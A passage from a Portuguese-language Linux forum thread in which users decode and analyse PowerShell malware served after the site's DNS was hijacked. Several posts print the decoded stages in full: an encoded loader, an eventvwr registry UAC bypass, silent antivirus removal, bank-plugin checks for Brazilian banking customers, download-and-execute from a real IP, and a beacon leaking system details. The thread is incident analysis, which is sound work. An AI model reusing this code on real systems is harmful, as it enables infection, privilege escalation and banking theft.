VOL sofreu sequestro de DNS e foi apontado para um site FAKE

73. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

removido
(usa Nenhuma)

Enviado em 25/11/2016 - 10:36h

EnzoFerber escreveu:

ru4n escreveu:

Malware que depende do IE e rWindows? acho que o cara invadiu a conta errada, pegou o VOL ao invés do baboo rsrsrs
--
Linux Counter: #596371

Num é? Pensei a mesma coisa...

Mas devemos nos lembrar que esse é um sujeito que deixou o ZAP dele no código...

Enzo Ferber
[]'s



$ indent -kr -i8 src.c



"(...)all right-thinking people know that (a) K&R are _right_ and (b) K&R are right." 

        - linux/Documentation/CodingStyle - TORVALDS, Linus.

É uma armadilha para pegar rato dentro de um aquário. rsrs

--
Linux Counter: #596371

2 0

Quote

74. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

EnzoFerber
(usa FreeBSD)

Enviado em 25/11/2016 - 10:37h

andremilke escreveu:

Esta string é um arquivo compactado, fiz um programa em C# e depurei, tratei no outro post https://www.vivaolinux.com.br/topico/Sites-Linux/Site-vivaolinux-solicitando-download-de-arquivo

Código para descompactar e decriptar

Não sabia que tinham dois tópicos tratando da mesma coisa.
Excelente código. Vou brincar com isso aqui. E esses IPs? Por acaso algum deles está no log de acesso Fábio?

Enzo Ferber
[]'s



$ indent -kr -i8 src.c



"(...)all right-thinking people know that (a) K&R are _right_ and (b) K&R are right." 

        - linux/Documentation/CodingStyle - TORVALDS, Linus.

0 0

Quote

75. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

andremilke
(usa Debian)

Enviado em 25/11/2016 - 10:42h

Um dos ips é lá de Amsterdã https://who.is/whois-ip/ip-address/31.220.57.180
https://www.ripe.net/

1 0

Quote

76. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

removido
(usa Nenhuma)

Enviado em 25/11/2016 - 10:43h

Posso estar falando besteira, mas esse malware só funcionaria se o usuário for cliente Itau?

$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};

--
Linux Counter: #596371

2 0

Quote

77. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

andremilke
(usa Debian)

Enviado em 25/11/2016 - 10:56h

Na linha 28, do arquivo descompactado há uma outra execução, criptada em 64, decriptei e cheguei no código abaixo:



sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('xVNLj5swED5vpPwHHyIlUU2FAfPYqocWhao9ZKPNqpcoBwqzDRWP1DjZjdL97/WLQNSVeuihEgajGc98D88kz9F7NI3vEscPksgjdJG4lITx2yz9hmM3oYuPi5hM341Hk6ypqrSW+bNNtkvZZrud+QGmIY4cHAaY2BQTYouvWISIFYlFVdTFxCHqjxBfZIi9HWFKMLVlPIrUvzzpmbBjq6/rYC+QcbEhxOkLyxzi6ZK2Z0qGav1ZQmcGPTyTqQGIBNcckXESSk4+xaEtH1/vPfkWUANNVCJWRTtWsr2j2P1dDe+igKIkgERBL4xKmiPrR1PUaDqdozdokufSgX3Kd1fyBwIPxcKEkHY+uFdYZFdVW7cUCX7QN6RGvq6pgaTZyQqSg5JKHX1N66izxLkIaPwkhqFtECgpBrQEoeIRzWafgFufOVQr1uyB8ROyVpKmJmst0woGhD3lhwbg6LqajyTrkaFq1oKxhn3IeNHUaF2UUPPyFDc1L+oDiDD8RJP6UJbz8814tIQnBaJrmzQsA/TrBnWBHt0/IPqalgdAl0GyuqIPpz2glrOi/n5pje4O3FoKfOhlPIKyhTM8F/xFXgM4Ci7HJ7bS1+GLqK810+/ZZlEfC9bUlUjb3t4KgZOmzEHlz3rkrw/lAPBc7ONdUeambHdQGx0OJsbX/0QPxfX8XVu+5injkngGbSvICl+03UNSl7x1CbBH1hqyps5bRCX7qs0eu1P/ZxaGjJC+xQ/QcnNvB/jm6HwPVXMEc7eG0K17yA6sBWO4NPY3'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()

Executei meu programa em C# novamente, com essa outra string de um arquivo comprimido e cheguei no seguinte:



$dd = 'COF267F9415EF3518C.cab,C3F5EBEC1';

$command = ([char[]](67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,99,109,100,46,101,120,101,32,47,99,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,114,117,110,100,108,108,51,50,32,36,101,110,118,58,65,80,80,68,65,84,65,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92) -join '') + $dd;

$path = ([char[]](72,75,67,85,58,92,83,111,102,116,119,97,114,101,92,67,108,97,115,115,101,115,92,109,115,99,102,105,108,101,92,115,104,101,108,108,92,111,112,101,110,92,99,111,109,109,97,110,100) -join '');

if ((Get-ItemProperty -Path $path -Name ([char[]](40,68,101,102,97,117,108,116,41) -join '') -ErrorAction SilentlyContinue) -eq $null){	

New-Item $path -Force |	 New-ItemProperty -Name ([char[]](40,68,101,102,97,117,108,116,41) -join '') -Value $command -PropertyType string -Force | Out-Null }

else{exit};

$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath(([char[]](83,121,115,116,101,109) -join ''))) -ChildPath ([char[]](101,118,101,110,116,118,119,114,46,101,120,101) -join '');

Start-Process -FilePath $eventvwrPath;

Start-Sleep -Seconds 5;

$mscfilePath = ([char[]](72,75,67,85,58,92,83,111,102,116,119,97,114,101,92,67,108,97,115,115,101,115,92,109,115,99,102,105,108,101) -join ''); 

if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force};

1 0

Quote

78. Estou emocionado

removido
(usa Nenhuma)

Enviado em 25/11/2016 - 11:00h

Vou dar uma estudada em tudo que apresentaram aqui.
Eu não sou programador, mas gosto de entender como funciona.
Um hobby.

Aquele hidden ali fazia o shell fechar rapidinho. Tirei pra ver as mensagens. Apesar que poderia ser direcionado para um arquivo.

Aqueles "a" estava dando um erro também. Em outro código que vi não tinha esses "a"s.
Mas, agora entendi ou acho que entendi pra que servem.

1 0

Quote

79. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

EnzoFerber
(usa FreeBSD)

Enviado em 25/11/2016 - 11:05h

andremilke escreveu:

Na linha 28, do arquivo descompactado há uma outra execução, criptada em 64, decriptei e cheguei no código abaixo:



sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('xVNLj5swED5vpPwHHyIlUU2FAfPYqocWhao9ZKPNqpcoBwqzDRWP1DjZjdL97/WLQNSVeuihEgajGc98D88kz9F7NI3vEscPksgjdJG4lITx2yz9hmM3oYuPi5hM341Hk6ypqrSW+bNNtkvZZrud+QGmIY4cHAaY2BQTYouvWISIFYlFVdTFxCHqjxBfZIi9HWFKMLVlPIrUvzzpmbBjq6/rYC+QcbEhxOkLyxzi6ZK2Z0qGav1ZQmcGPTyTqQGIBNcckXESSk4+xaEtH1/vPfkWUANNVCJWRTtWsr2j2P1dDe+igKIkgERBL4xKmiPrR1PUaDqdozdokufSgX3Kd1fyBwIPxcKEkHY+uFdYZFdVW7cUCX7QN6RGvq6pgaTZyQqSg5JKHX1N66izxLkIaPwkhqFtECgpBrQEoeIRzWafgFufOVQr1uyB8ROyVpKmJmst0woGhD3lhwbg6LqajyTrkaFq1oKxhn3IeNHUaF2UUPPyFDc1L+oDiDD8RJP6UJbz8814tIQnBaJrmzQsA/TrBnWBHt0/IPqalgdAl0GyuqIPpz2glrOi/n5pje4O3FoKfOhlPIKyhTM8F/xFXgM4Ci7HJ7bS1+GLqK810+/ZZlEfC9bUlUjb3t4KgZOmzEHlz3rkrw/lAPBc7ONdUeambHdQGx0OJsbX/0QPxfX8XVu+5injkngGbSvICl+03UNSl7x1CbBH1hqyps5bRCX7qs0eu1P/ZxaGjJC+xQ/QcnNvB/jm6HwPVXMEc7eG0K17yA6sBWO4NPY3'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()

Executei meu programa em C# novamente, com essa outra string de um arquivo comprimido e cheguei no seguinte:



$dd = 'COF267F9415EF3518C.cab,C3F5EBEC1';

$command = ([char[]](67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,99,109,100,46,101,120,101,32,47,99,32,112,111,119,101,114,115,104,101,108,108,46,101,120,101,32,114,117,110,100,108,108,51,50,32,36,101,110,118,58,65,80,80,68,65,84,65,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,84,101,109,112,108,97,116,101,115,92) -join '') + $dd;

$path = ([char[]](72,75,67,85,58,92,83,111,102,116,119,97,114,101,92,67,108,97,115,115,101,115,92,109,115,99,102,105,108,101,92,115,104,101,108,108,92,111,112,101,110,92,99,111,109,109,97,110,100) -join '');

if ((Get-ItemProperty -Path $path -Name ([char[]](40,68,101,102,97,117,108,116,41) -join '') -ErrorAction SilentlyContinue) -eq $null){	

New-Item $path -Force |	 New-ItemProperty -Name ([char[]](40,68,101,102,97,117,108,116,41) -join '') -Value $command -PropertyType string -Force | Out-Null }

else{exit};

$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath(([char[]](83,121,115,116,101,109) -join ''))) -ChildPath ([char[]](101,118,101,110,116,118,119,114,46,101,120,101) -join '');

Start-Process -FilePath $eventvwrPath;

Start-Sleep -Seconds 5;

$mscfilePath = ([char[]](72,75,67,85,58,92,83,111,102,116,119,97,114,101,92,67,108,97,115,115,101,115,92,109,115,99,102,105,108,101) -join ''); 

if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force};

As strings em ASCII desse código são:



$command = C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\



$path = HKCU:\Software\Classes\mscfile\shell\open\command



A primeira de $eventvwrPath = System

a segunda = eventvwr.exe



$mscfilePath = HKCU:\Software\Classes\mscfile

Editei o arquivo pra converter ASCII em strings, se alguem quiser usar:



#include <stdio.h>

#include <ctype.h>



int main(int argc, char *argv[])

{

	FILE *fp;

	int c, number = 0;



	if(argc < 2) fp = stdin;

	else fp = fopen(argv[1], "r");



	while((c = fgetc(fp))) {

		if(!isdigit(c)) {

			if(number) {

				putchar(number);

				number = 0;

			}

		} else {

			number *= 10;

			number += c - 48;

		}

		if(feof(fp)) break;

	}

	return 0;

}

Enzo Ferber
[]'s

2 0

Quote

80. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

Mauriciodez
(usa Debian)

Enviado em 25/11/2016 - 11:21h

ru4n escreveu:
Posso estar falando besteira, mas esse malware só funcionaria se o usuário for cliente Itau?
Linux Counter: #596371

Poutz velho ... só clientes itáu ???? sério mesmo ??? tomara q ele tenha invadido minha conta e tenha pagado meu cheque especial !!! uhuuuuuuuuuuuuuu ...
___________________________________________________________________________________________
" Nem sempre é amigo aquele que te tira do buraco !!! ( Saddam Hussein )"

1 0

Quote

81. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

andremilke
(usa Debian)

Enviado em 25/11/2016 - 12:53h

Terminei de decriptar o código todo da função, tive que fazer mais algumas iterações descompactando e decriptando.



$ie = New-Object -com internetexplorer.application; 

$ie.visible = $true; 

$ie.navigate("");

$mtx = New-Object System.Threading.Mutex($false, "mtt")

if ($mtx.WaitOne(500)) {

if(-not (Test-Path "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')")){

	(Windows working normally, ignore this log -join '') >> "$env:APPDATA\$(Microsoft\Windows\Templates\log.txt -join '')"

	if(((Get-Culture).Name.ToLower() -eq (pt-Br -join '').ToLower())) {

		$dir = (${env:ProgramFiles(x86)}, ${env:ProgramFiles} -ne $null)[0];

		$gbPath = Join-Path $dir (GbPlugin -join '');

		$paths = @{(Join-Path $gbPath gbiehcef.dll) = "104";(Join-Path $gbPath gbiehscd.dll) = "751";(Join-Path $gbPath gbieh.dll) = "001";(Join-Path $gbPath gbiehuni.dll) = "341";(Join-Path ($env:ProgramFiles) "\AppBrad\NetExpress50.exe") = "APP237";(Join-Path ($env:ProgramFiles) Trusteer) = "Trust";(Join-Path ($env:LOCALAPPDATA) "\Aplicativo Itau\itauaplicativo.exe") = "APP341";};

		foreach ($path in $paths.GetEnumerator()) { if(Test-Path $($path.Name) ){ $V1 += $($path.Value) + ","}};

		$avs = (Get-WmiObject -Namespace (root\SecurityCenter2 -join '') -QUERY (SELECT DisplayName FROM AntiVirusProduct -join ''));

		foreach ($av1 in $avs) { $av += $av1.displayName + ","}; 

		if($av -like "*avg*"){

			Start-Process -WindowStyle Hidden powershell.exe -ArgumentList -NoP -NonI -W Hidden -E  $command = 'C:\Windows\System32\cmd.exe /c powershell -NoP -NonI -W Hidden -E "$uninstall32s = gci "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;

$uninstall64s = gci "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" | foreach { gp $_.PSPath } | ? { $_ -like "*AVG*" } | select UninstallString;



foreach($uninstall64 in $uninstall64s) {

$uninstall64 = $uninstall64.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";

$uninstall64 = $uninstall64.Trim();

if($uninstall64 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall64  /qn /norestart" -Wait }};

foreach($uninstall32 in $uninstall32s) {

$uninstall32 = $uninstall32.UninstallString -Replace "MsiExec.exe","" -Replace "/I","" -Replace "/X","";

$uninstall32 = $uninstall32.Trim();

if($uninstall32 -like "*Program Files*"){}else{start-process "msiexec.exe" -args "/x $uninstall32  /qn /norestart" -Wait }};"';

$path = "HKCU:\Software\Classes\mscfile\shell\open\command";

if ((Get-ItemProperty -Path $path -Name "(default)" -ErrorAction SilentlyContinue) -eq $null){	

New-Item $path -Force |	 New-ItemProperty -Name "(Default)" -Value $command -PropertyType string -Force | Out-Null }

else{exit};

$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath("System")) -ChildPath "eventvwr.exe";

Start-Process -FilePath $eventvwrPath;

Start-Sleep -Seconds 5;

$mscfilePath = "HKCU:\Software\Classes\mscfile"; 

if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force}; -join'' -wait;

			while((get-service -Name (avgwd -join '')).Status -eq (Running -join '')) {Start-Sleep -Seconds 10;}

		}

		$ps = (Get-ChildItem (HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP -join '') -recurse | Get-ItemProperty -name Version,Release -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select Version | Sort-Object Version –Descending)[0].Version;

		if(Test-Path $(Join-Path $dir (WinRAR -join ''))){

			$wr = (.:Winrar-join '')

		}

		if($v1) {

			$durl = "http://130.211.157.13/artw/COF267F9415EF3518C.cab"

			$ll = "COF267F9415EF3518C.cab"

			$output = "$env:APPDATA\$(Microsoft\Windows\Templates\ -join '')" + $ll;

			(New-Object System.Net.WebClient).DownloadFile($durl, $output);

			Start-Process -WindowStyle Hidden  powershell.exe -ArgumentList "-NoP -NonI -W Hidden -E 	$dd = 'COF267F9415EF3518C.cab,C3F5EBEC1';

																										$command = (C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\ -join '') + $dd;

																										$path = (HKCU:\Software\Classes\mscfile\shell\open\command -join '');

																										if ((Get-ItemProperty -Path $path -Name ((Default) -join '') -ErrorAction SilentlyContinue) -eq $null){	

																										New-Item $path -Force |	 New-ItemProperty -Name ((Default) -join '') -Value $command -PropertyType string -Force | Out-Null }

																										else{exit};

																										$eventvwrPath = Join-Path -Path ([Environment]::GetFolderPath((System -join ''))) -ChildPath (eventvwr.exe -join '');

																										Start-Process -FilePath $eventvwrPath;

																										Start-Sleep -Seconds 5;

																										$mscfilePath = (HKCU:\Software\Classes\mscfile -join ''); 

																										if (Test-Path $mscfilePath) {Remove-Item $mscfilePath -Recurse -Force};

																										";

		}

		$durl = "http://130.211.157.13/artw/arquivo"

		Start-Process -WindowStyle Hidden powershell.exe -ArgumentList "-NoP -NonI -W Hidden iex(New-Object Net.WebClient).DownloadString('$durl')"

		$tudo = (Get-WmiObject -Namespace (root\CIMV2-join '') -QUERY (SELECT * FROM Win32_OperatingSystem -join ''));

		$w = [System.Net.WebRequest]::Create("http://31.220.57.180/frontile/LIMITED/LetsGo.php" + "?A=A&Sytem=" + $tudo.CSName + "::" + $tudo.Caption + ".:" + $tudo.CSDVersion +"("+$tudo.OsArchitecture+")"+ "ps.:" + $ps + $wr + "" +"&qual=" + $V1 + "&ele=" + $av).getResponse();

	}

}

$mtx.ReleaseMutex()

$mtx.Dispose()

}

2 0

Quote

82. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

removido
(usa Nenhuma)

Enviado em 25/11/2016 - 12:57h

andremilke escreveu:

Um dos ips é lá de Amsterdã https://who.is/whois-ip/ip-address/31.220.57.180
https://www.ripe.net/

Tem um monte de IPs dentro do fonte dele.
E ele pede pra instalar um flash player em 2015.
view-source:http://31.220.57.180/

0 0

Quote

83. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

removido
(usa Nenhuma)

Enviado em 25/11/2016 - 13:11h

EnzoFerber escreveu:

As strings em ASCII desse código são:



$command = C:\Windows\System32\cmd.exe /c powershell.exe rundll32 $env:APPDATA\Microsoft\Windows\Templates\



$path = HKCU:\Software\Classes\mscfile\shell\open\command



A primeira de $eventvwrPath = System

a segunda = eventvwr.exe



$mscfilePath = HKCU:\Software\Classes\mscfile

Editei o arquivo pra converter ASCII em strings, se alguem quiser usar:



#include <stdio.h>

#include <ctype.h>



int main(int argc, char *argv[])

{

	FILE *fp;

	int c, number = 0;



	if(argc < 2) fp = stdin;

	else fp = fopen(argv[1], "r");



	while((c = fgetc(fp))) {

		if(!isdigit(c)) {

			if(number) {

				putchar(number);

				number = 0;

			}

		} else {

			number *= 10;

			number += c - 48;

		}

		if(feof(fp)) break;

	}

	return 0;

}

Enzo Ferber
[]'s

Foram bem rápidos.
Um dia eu alcanço esse conhecimento.
Obrigado por tudo que fez por nós hoje.

0 0

Quote

84. Re: VOL sofreu sequestro de DNS e foi apontado para um site FAKE

removido
(usa Nenhuma)

Enviado em 25/11/2016 - 13:14h

[quote]andremilke escreveu:

Terminei de decriptar o código todo da função, tive que fazer mais algumas iterações descompactando e decriptando.

Muito show.
Fez um excelente trabalho e bem rápido.
Obrigado por passar seu conhecimento.
Vou aprender muito com tudo que fez por nós hoje.

0 0

Quote